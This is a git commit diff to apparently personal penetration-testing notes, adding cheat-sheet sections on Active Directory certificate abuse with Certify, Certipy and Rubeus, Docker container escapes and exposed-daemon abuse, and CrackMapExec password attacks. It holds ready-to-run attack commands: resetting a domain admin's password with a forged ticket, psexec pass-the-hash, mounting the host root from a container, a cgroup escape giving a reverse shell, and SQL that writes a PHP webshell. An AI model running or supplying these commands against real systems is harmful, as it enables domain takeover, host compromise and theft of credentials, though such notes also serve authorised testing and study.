AD certificate and docker escapes
This commit is contained in:
parent
74845509af
commit
bbef002f0a
|
@ -28,6 +28,14 @@ Exploitable templates should have the following traits:
|
|||
* Find groups by `net user <username> /domain` --> `Domain Users`, `Domain Computers`
|
||||
* Client authentication EKU for Kerberos authentication --> `Client Authentication`
|
||||
* Permission to subject alternative name (SAN), e.g. URL to encrypt. Used to create Kerberos ticket, --> `CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT`
|
||||
|
||||
#### Certify
|
||||
|
||||
Find information about all registered CAs. For a start take a look at least at
|
||||
```sh
|
||||
Certify.exe find /vulnerable
|
||||
```
|
||||
|
||||
|
||||
### Certificate Creation
|
||||
|
||||
|
@ -36,18 +44,25 @@ Exploitable templates should have the following traits:
|
|||
* After that in the main menu, `Personal` --> `Certificates` --> __The certificate__
|
||||
* Right click certificate --> `All Tasks` --> `Export` --> `Yes, export private key` --> `PFX` --> set `Password` --> Save
|
||||
|
||||
* An alternative is certipy-ad
|
||||
An alternative is certipy-ad
|
||||
|
||||
#### Certipy-AD
|
||||
|
||||
First `pip install certipy-ad`
|
||||
Take a look at the Documentation provided in the [git repositories'
|
||||
README](https://github.com/ly4k/Certipy?source=post_page-----c56f238991c0--------------------------------#esc7).
|
||||
Since it is possible to create certifcates of (Sub)CAs if you do have the right permissions on CA directly, it is worth a check.
|
||||
[Hacktricks' AD CS Domain Escalation](https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation) provides the details.
|
||||
|
||||
### Impersonation
|
||||
|
||||
* Request TGT with the created cert
|
||||
* Grab TGT
|
||||
Request TGT with the created cert.
|
||||
|
||||
* On the machine via
|
||||
#### On the target machine via
|
||||
```sh
|
||||
Rubeus.exe asktgt /user:<user (UPN) of cert> /enctype:aes256 /certificate:<path to certificate> /password:<certificate file password> /outfile:<name of file to write TGT to.kirbi> /domain:<domain name> /dc:<IP of domain controller>
|
||||
```
|
||||
* Select a domain admin via opening `Active Directory Users and Computers`
|
||||
Select a domain admin via opening `Active Directory Users and Computers`
|
||||
```sh
|
||||
.\Rubeus.exe changepw /ticket:<ticketfilename> /new:<new password> /dc:<domain of controller> /targetuser:<domain>\<dauser>
|
||||
```
|
||||
|
@ -61,6 +76,13 @@ exit
|
|||
dir \\<domain>\<dir>$\
|
||||
```
|
||||
|
||||
#### On the attacking machine
|
||||
|
||||
Use impacket's psexec
|
||||
```sh
|
||||
psexec.py $DOMAIN/administrator@$DOMAIN -hashes $found_hash -dc-ip $DC_IP
|
||||
```
|
||||
|
||||
## CVE-2022-26923
|
||||
|
||||
* Aims on abusing templates configuration, the Subject Alternative Name `SAN`. Set it to someone with higher permissions
|
||||
|
|
|
@ -54,45 +54,39 @@ curl http://example.com:5000/v2/<REPOSITORY>/tags/list
|
|||
curl http://test.com:5000/v2/<REPO>/<APP>/manifest/<TAG>
|
||||
```
|
||||
|
||||
## Reversing Docker Images
|
||||
## Remote Docker Daemon
|
||||
|
||||
* [Dive](https://github.com/wagoodman/dive)
|
||||
Users inside the `docker` group may open tcp socket through docker
|
||||
In case you find an exposed docker daemon it can be used in the following way
|
||||
|
||||
```sh
|
||||
dive <IMAGE-ID>
|
||||
docker -H tcp://$TARGET_IP:2375 ps
|
||||
docker -H tcp://$TARGET_IP:2375 images
|
||||
docker -H tcp://test.com:2375 exec <container> <cmd>
|
||||
docker -H tcp://$TARGET_IP:2375 run -it -v /:/mnt/host alpine:3.9 /bin/sh
|
||||
```
|
||||
|
||||
## Uploading Images to Registry
|
||||
|
||||
* Ever image has a `latest` tag
|
||||
* Upload modified docker image as `latest`
|
||||
* [Article](https://www.trendmicro.com/vinfo/us/security/news/virtualization-and-cloud/malicious-docker-hub-container-images-cryptocurrency-mining)
|
||||
|
||||
## RCE via Exposed Docker Daemon
|
||||
|
||||
* Users inside the `docker` group may open tcp socket through docker
|
||||
* `nmap -sV -p- <IP> -vv` to find exposed tcp sockets via docker
|
||||
* Confirming via `curl http://test.com:2375/version` on open docker port
|
||||
* Execute commands on socket
|
||||
Execute commands on socket
|
||||
|
||||
```sh
|
||||
docker -H tcp://test.com:2375 ps
|
||||
docker -H tcp://test.com:2375 exec <container> <cmd>
|
||||
docker -H tcp://$TARGET_IP:2375 run -it -v /:/mnt/host alpine:3.9 /bin/sh
|
||||
```
|
||||
|
||||
* [root please](https://registry.hub.docker.com/r/chrisfosterelli/rootplease)
|
||||
|
||||
## Escape Container via Exposed Docker Daemon
|
||||
|
||||
* Looking for exposed docker sockets
|
||||
Look out for exposed docker sockets
|
||||
|
||||
```sh
|
||||
find / -name "*sock" 2>/dev/null
|
||||
groups
|
||||
```
|
||||
|
||||
* Mount the host volume and chroot to it, need alpine image.
|
||||
Mount the host volume and chroot to it. Ideally, use an image that is
|
||||
installed already, e.g. alpine here.
|
||||
|
||||
```sh
|
||||
docker images
|
||||
|
@ -107,34 +101,27 @@ docker run -v /:/host --rm -it <imageID> chroot /host/ bash
|
|||
|
||||
## Shared Namespaces
|
||||
|
||||
* Namespaces
|
||||
* Cgroups
|
||||
* OverlayFS
|
||||
|
||||
* Requires root inside the container
|
||||
|
||||
* Execute command
|
||||
Requires root inside the container
|
||||
|
||||
```sh
|
||||
nsenter --target 1 --mount sh
|
||||
nsenter --target 1 --mount --uts --ipc --net /bin/bash
|
||||
```
|
||||
|
||||
## Misconfiguration
|
||||
|
||||
### capabilities
|
||||
### Capabilities
|
||||
|
||||
* Privileged container connect to the host directly, not through the docker engine
|
||||
* Execution of bins on the host from libs inside the container is possible
|
||||
Privileged container connect to the host directly, not through the docker engine.
|
||||
Execution of binaries on the host from inside the container is possible.
|
||||
|
||||
```sh
|
||||
capsh --print
|
||||
```
|
||||
|
||||
* `man capabilities`
|
||||
|
||||
* [PoC](https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/#:~:text=The%20SYS_ADMIN%20capability%20allows%20a,security%20risks%20of%20doing%20so.)
|
||||
|
||||
* Exploit and get a reverse shell to the host via
|
||||
Exploit and get a reverse shell to the host via
|
||||
|
||||
```sh
|
||||
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
|
||||
|
@ -147,7 +134,7 @@ chmod a+x /exploit
|
|||
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
|
||||
```
|
||||
|
||||
* The file may appear outside the container on the host system
|
||||
Caveat: The file may appear outside the container on some host systems. Have to investigate...
|
||||
|
||||
### cap_admin
|
||||
|
||||
|
@ -169,8 +156,8 @@ the docker volume, e.g.
|
|||
|
||||
## Check fdisk
|
||||
|
||||
* `fdisk -l` and `lsblk`, host bulk device may be exposed
|
||||
* Mount the device
|
||||
`fdisk -l` and `lsblk`, host bulk device may be exposed
|
||||
Mount the device
|
||||
|
||||
```sh
|
||||
mkdir /mnt/hostdev
|
||||
|
@ -218,6 +205,20 @@ Connection: Upgrade
|
|||
Upgrade: tcp
|
||||
```
|
||||
|
||||
## Reversing Docker Images
|
||||
|
||||
* [Dive](https://github.com/wagoodman/dive)
|
||||
|
||||
```sh
|
||||
dive <IMAGE-ID>
|
||||
```
|
||||
|
||||
## Uploading Images to Registry
|
||||
|
||||
* Ever image has a `latest` tag
|
||||
* Upload modified docker image as `latest`
|
||||
* [Article](https://www.trendmicro.com/vinfo/us/security/news/virtualization-and-cloud/malicious-docker-hub-container-images-cryptocurrency-mining)
|
||||
|
||||
## Escape through DB
|
||||
|
||||
* Login into DB
|
||||
|
@ -226,14 +227,14 @@ Upgrade: tcp
|
|||
* Select table content into a file the user can read
|
||||
* Execute the file
|
||||
|
||||
```sql
|
||||
```SQL
|
||||
create table h4x0r (pwn varchar(1024));
|
||||
insert into h4x0r (pwn) values ('<?php $cmd=$_GET["cmd"];system($cmd);?>');
|
||||
select '<?php $cmd=$_GET["cmd"];system($cmd);?>' from h4x0r INTO OUTFILE '/var/www/html/shell.php';
|
||||
copy (select '<?php $cmd=$_GET["cmd"];system($cmd);?>' from h4x0r) to '/var/www/html/shell.php'; # In case of PostreSQL
|
||||
```
|
||||
|
||||
* curl the webshell hon the exploited host
|
||||
curl the webshell hon the exploited host
|
||||
|
||||
```sh
|
||||
curl <host-IP>/shell.php?cmd=id
|
||||
|
|
|
@ -1,23 +1,39 @@
|
|||
# Crackmapexec
|
||||
|
||||
* Dictionary attack against SMB
|
||||
```sh
|
||||
cme smb domain.name -u <user> s -p /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
|
||||
## Dictionary attack against SMB
|
||||
|
||||
```sh
|
||||
cme <smb/mssql> <domain/IP> -u <user> s -p /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt --continue-on-sucess --no-brute
|
||||
```
|
||||
* Use the password with `impacket/examples/psexec.py` in the following way
|
||||
|
||||
## Brute Force attack against SMB
|
||||
|
||||
Brute force attack using an anonymous user
|
||||
|
||||
```sh
|
||||
cme smb <TARGET_IP> -u anonymous -p "" --rid-brute 10000
|
||||
```
|
||||
|
||||
## Use Found Password
|
||||
|
||||
Use the password with `impacket/examples/psexec.py` in the following way
|
||||
|
||||
```sh
|
||||
psexec.py domain.name/<user>:<password>@<target-IP>
|
||||
```
|
||||
|
||||
## Shares
|
||||
## Enumerate Shares
|
||||
|
||||
* Check user permissions on shares
|
||||
``sh
|
||||
Check user permissions on shares
|
||||
|
||||
```sh
|
||||
crackmapexec smb 10.200.x.0/24 -u <user> -p <password> --shares
|
||||
```
|
||||
|
||||
## SMB
|
||||
* Check user hash on the network via smb
|
||||
|
||||
Check user hash on the network via smb
|
||||
|
||||
```sh
|
||||
crackmapexec smb 10.200.x.0/24 -u <user> -d <domain> -H <hash>
|
||||
```
|
||||
|
|
Loading…
Reference in New Issue